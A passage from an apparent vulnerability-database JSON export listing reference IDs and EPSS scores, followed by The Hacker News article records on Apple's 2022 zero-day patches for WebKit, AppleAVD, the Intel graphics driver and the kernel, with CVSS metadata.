"QUALYSBLOG:5F3A665821FA30373004EC52F5104E15", "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299", "RHSA-2022:1777"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105", "RH:CVE-2022-22594", "RH:CVE-2022-22620"]}, {"type": "rocky", "idList": ["RLSA-2022:1777"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2022:0705-1", "SUSE-SU-2022:1431-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB", "TALOSBLOG:AFFA9F54A1744A8B65903B06E9C56C3A", "TALOSBLOG:C9F50677FB4030903E6114F7C17FD8DB"]}, {"type": "thn", "idList": ["THN:161777F5DB73EF3AB5B13EF9F11E3374", "THN:1D10167F5D53B2791D676CF56488D5D9", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4B97BCD00CAE89549A57EBFAECA484AE", "THN:4DE731C9D113C3993C96A773C079023F", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:76F500CE84314456F7B0E4DD1D56D971", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8755093D287CCB8F16A1A7CD3BDB6ACF", "THN:933FE23273AB5250B949633A337D44E1", "THN:9A9EADE3A5D4449C9E0519E22A93B306", "THN:A60A19BF44B2CA75E63F31234992BE54", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:B7C3E2FB36F3AC7424BD3AE9F877CF3C", "THN:BD5ADDFE4C645A1619B0A94487CE63DF", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:CE191128AE56CD5C614344408C285C87", "THN:DCB20559AE0C35EB864725D482E268C2", "THN:DEAEC76D89D5583101E2E6036C289609", "THN:DF2B6840863D6847D7088B1A07B19A4A", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:EC350D7E2CF02EC9CB76AA85E0D3F47A", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trellix", "idList": ["TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:4EE3028711C16E3513FC2CF300440452", "TRELLIX:73420774AE3767CFB11F493B41572174", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046", "UB:CVE-2022-22594", "UB:CVE-2022-22620"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348", "VERACODE:34009", "VERACODE:34313"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889", "1337DAY-ID-38098"]}]}, "exploitation": null, "score": {"value": -0.0, "vector": "NONE"}, "epss": [{"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22587", "epss": "0.001030000", "percentile": "0.404270000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22594", "epss": "0.000700000", "percentile": "0.283760000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22620", "epss": "0.000930000", "percentile": "0.381750000", "modified": "2023-03-18"}], "vulnersScore": -0.0}, "_state": {"dependencies": 1678920471, "score": 1698844884, "epss": 1679178262}, "_internal": {"score_hash": "fc43876539ee7664c2c56fc7e8da9e5d"}}

{"thn": [{"lastseen": "2022-05-09T12:37:34", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjWiyPjnO359TQw-ASi6DIPZwvn9wVYFPNKS3PisnT8ANUMYz00ayq07GNT9j1BFhyIS-D-jW986AambKLx09TTpm1sTyhHBIwq5WnnLL6xLWbYO1lXdLaECt48nhwVzddm8IqWxgudeEmeXUPQEYzzGysp58wveGqZNvgqyliX2YcqPhBbbb8vV41h>)\n\nApple on Thursday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213093>), [macOS](<https://support.apple.com/en-us/HT213092>), and [Safari](<https://support.apple.com/en-us/HT213091>) to address a new WebKit flaw that it said may have been actively exploited in the wild, making it the company's third zero-day patch since the start of the year.\n\nTracked as CVE-2022-22620, the issue concerns a use-after-free vulnerability in the WebKit component that powers the Safari web browser and could be exploited by a piece of specially crafted web content to gain arbitrary code execution. \n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the company said in a terse statement acknowledging in-the-wild attacks leveraging the flaw.\n\nThe iPhone maker credited an anonymous researcher for discovering and reporting the flaw, adding it remediated the issue with improved memory management.\n\nThe updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation), macOS devices running Big Sur and macOS Catalina, and also as a standalone update for Safari.\n\nThe latest fix brings the tally of zero-day patches issued by Apple for 2022 to three, including [CVE-2022-22587 and CVE-2022-22594](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>), that could have been exploited to run arbitrary code and track users' online activity in the web browser.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-11T03:30:00", "type": "thn", "title": "Apple Releases iOS, iPadOS, macOS Updates to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620"], "modified": "2022-02-11T03:30:50", "id": "THN:BD5ADDFE4C645A1619B0A94487CE63DF", "href": "https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhEqKxDFmqhm8NEDiewGhtNosTQBetNOal6t8n-4FoDdS8Kohm2E_VIZmFt-TPGCUJfQqQR3I7FPUW16SUdjUlffpqOIkMXuwO85Pl8ENa14N6-OhtYk5Ft_5V-I0aQwBj6iNfvx3_Z5DnTUwfcvtSl6p_28rahMQ1dk0sc12TyBQhB-9vuz8heo2me/s728-e100/apple.jpg>)\n\nApple on Thursday rolled out emergency patches to address two zero-day flaws in its [mobile](<https://support.apple.com/en-us/HT213219>) and [desktop operating systems](<https://support.apple.com/en-us/HT213220>) that it said may have been exploited in the wild.\n\nThe shortcomings have been fixed as part of updates to iOS and iPadOS 15.4.1, macOS Monterey 12.3.1, tvOS 15.4.1, and watchOS 8.5.1. Both the vulnerabilities have been reported to Apple anonymously.\n\nTracked as **CVE-2022-22675**, the issue has been described as an [out-of-bounds write](<https://cwe.mitre.org/data/definitions/787.html>) vulnerability in an audio and video decoding component called AppleAVD that could allow an application to execute arbitrary code with kernel privileges.\n\nApple said the defect was resolved with improved bounds checking, adding it's aware that \"this issue may have been actively exploited.\"\n\nThe latest version of macOS Monterey, besides fixing CVE-2022-22675, also includes remediation for **CVE-2022-22674**, an [out-of-bounds read](<https://cwe.mitre.org/data/definitions/125.html>) issue in the Intel Graphics Driver module that could enable a malicious actor to read kernel memory.\n\nThe bug was \"addressed with improved input validation,\" the iPhone maker noted, once again stating there's evidence of active exploitation, while withholding additional details to prevent further abuse.\n\nThe latest updates bring the total number of actively exploited zero-days patched by Apple to four since the start of year, not to mention a publicly disclosed flaw in the [IndexedDB API](<https://thehackernews.com/2022/01/new-unpatched-apple-safari-browser-bug.html>) (CVE-2022-22594), which could be weaponized by a malicious website to track users' online activity and identities in the web browser.\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n\nIn light of active exploitation of the flaws, Apple iPhone, iPad, and Mac users are highly recommended to upgrade to the latest versions of the software as soon as possible to mitigate potential threats.\n\nThe iOS and iPad updates are available to iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T02:43:00", "type": "thn", "title": "Apple Issues Patches for 2 Actively Exploited Zero-Days in iPhone, iPad and Mac Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675"], "modified": "2022-04-01T02:54:05", "id": "THN:B7C3E2FB36F3AC7424BD3AE9F877CF3C", "href": "https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T08:22:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBAbKGPJ0333Ymy0pNRh1c2YnrPqm6TS2UIjUjovslcTAhZDG3ZiJL2NUGwYskLCWmfGgOrY2C7Oc4f0mSnUJpQx8uiCxQx1F8ThJNkKWy0mvxkKZyYnL5JSm5bgrDyPNaikwN2eUSslZnjTx6WxpApYeSvWf5SyIsbvk-dvrtzyNCGFSdpQF6zVtW/s728-e100/apple-software-update.jpg>)\n\nApple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.\n\nThe issue, assigned the identifier **CVE-2022-32917**, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.\n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the iPhone maker acknowledged in a brief statement, adding it resolved the bug with improved bound checks.\n\nAn anonymous researcher has been credited with reporting the shortcoming. It's worth noting that CVE-2022-32917 is also the [second Kernel related zero-day 